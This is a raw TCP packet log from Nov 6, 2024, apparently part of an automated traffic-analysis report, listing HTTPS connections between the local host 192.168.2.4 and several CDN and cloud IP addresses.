                                                                                                                                                                                                            Nov 6, 2024 06:29:42.642270088 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.642288923 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.642880917 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.643137932 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.643145084 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.643944025 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.643961906 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.644028902 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.647629976 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.647635937 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.649070024 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.649092913 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.650181055 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.650188923 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.650727034 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.650739908 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.651379108 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.651384115 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666040897 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666217089 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666249037 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666279078 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666285038 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666291952 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666321039 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666862011 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666914940 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666915894 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666924000 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.666965961 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.667207003 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.667237043 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.667280912 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.667285919 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.667383909 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.710306883 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.710448980 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.710581064 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.746440887 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.747370958 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.747397900 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.747600079 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.748718977 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.748745918 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.748806953 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.764759064 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.765124083 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.765172958 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.767173052 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.767254114 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.767301083 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.773569107 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.773860931 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.775285959 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.775363922 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.775527954 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.775573015 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.778057098 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.778112888 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.778167963 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785171032 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785228968 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785233974 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785243034 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785270929 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785274982 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785296917 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785742998 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785787106 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785792112 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.785847902 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.786108971 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.786161900 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.791330099 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.793462038 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.793473959 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.794323921 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.794332981 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.794430017 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.802850962 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.802881002 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.802941084 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807223082 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807233095 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807264090 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807267904 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807856083 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807877064 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807890892 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.807897091 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.811322927 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.811328888 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.812829971 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.812840939 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.812944889 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.812949896 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.814460039 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.814465046 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.829360008 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.829389095 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.829955101 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.829961061 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.831175089 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.831197977 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.837498903 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.837507963 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.837625980 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.838715076 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.838721037 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.838778019 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.839123964 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.839132071 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.839694023 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.839704037 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.840948105 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.840955019 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.846203089 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.846225977 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.846426964 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.856901884 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.856935978 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.857039928 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.857359886 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.857378960 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.857577085 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.859365940 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.859374046 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.859436035 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.859713078 CET57706443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.859724045 CET4435770613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.860043049 CET57703443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.860068083 CET4435770313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.865144014 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.865151882 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.865210056 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.866003036 CET57704443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.866017103 CET4435770413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.866491079 CET57705443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.866503000 CET4435770513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.867033005 CET57707443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.867043018 CET4435770713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.903898001 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.903959036 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.904195070 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.904244900 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.904620886 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.904680014 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.905200005 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.905260086 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.946177959 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.946243048 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989192963 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989239931 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989296913 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989329100 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989350080 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989367008 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989381075 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989450932 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.989504099 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.993153095 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.993165970 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.994172096 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.994203091 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.994362116 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.996957064 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.996978998 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.022726059 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.022778988 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.023036957 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.023085117 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.023371935 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.023417950 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.023813963 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.023863077 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.051836967 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.051852942 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.052072048 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.052659035 CET57709443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.052666903 CET44357709172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.141515017 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.141608000 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.141628027 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.141684055 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142201900 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142255068 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142422915 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142493963 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142502069 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142537117 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142582893 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.142589092 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.145195007 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.184030056 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.184108973 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.260386944 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.260462046 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.260586023 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.260674953 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.261164904 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.261214972 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.302740097 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.302773952 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.302820921 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.302826881 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.302861929 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.302875042 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.379905939 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.379934072 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.379992008 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.379997969 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.380007982 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.380055904 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.380109072 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.380158901 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.380489111 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.380542040 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.412872076 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.419678926 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.419689894 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.420958042 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.421756029 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.421828985 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.423548937 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.423737049 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.424006939 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.435095072 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.436140060 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.436152935 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.437230110 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.437277079 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.437308073 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.438133001 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.438139915 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.439191103 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.439249039 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.440864086 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.440921068 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.442003965 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.442056894 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.442470074 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.442478895 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.442696095 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.442702055 CET44357698162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.457320929 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.464817047 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.471323013 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.489855051 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.489856005 CET57698443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.490253925 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.490261078 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.490485907 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.490499020 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.490916014 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.491535902 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.491594076 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.493504047 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.493578911 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.495265007 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.495346069 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.495434046 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.496107101 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.496114016 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.498405933 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.498471022 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.498759985 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.498826981 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499241114 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499272108 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499283075 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499288082 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499332905 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499332905 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499828100 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.499891043 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.539333105 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.540544033 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.540596962 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.550098896 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.568849087 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.568998098 CET44357696162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569050074 CET57696443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.569453955 CET57696443192.168.2.4162.159.140.34
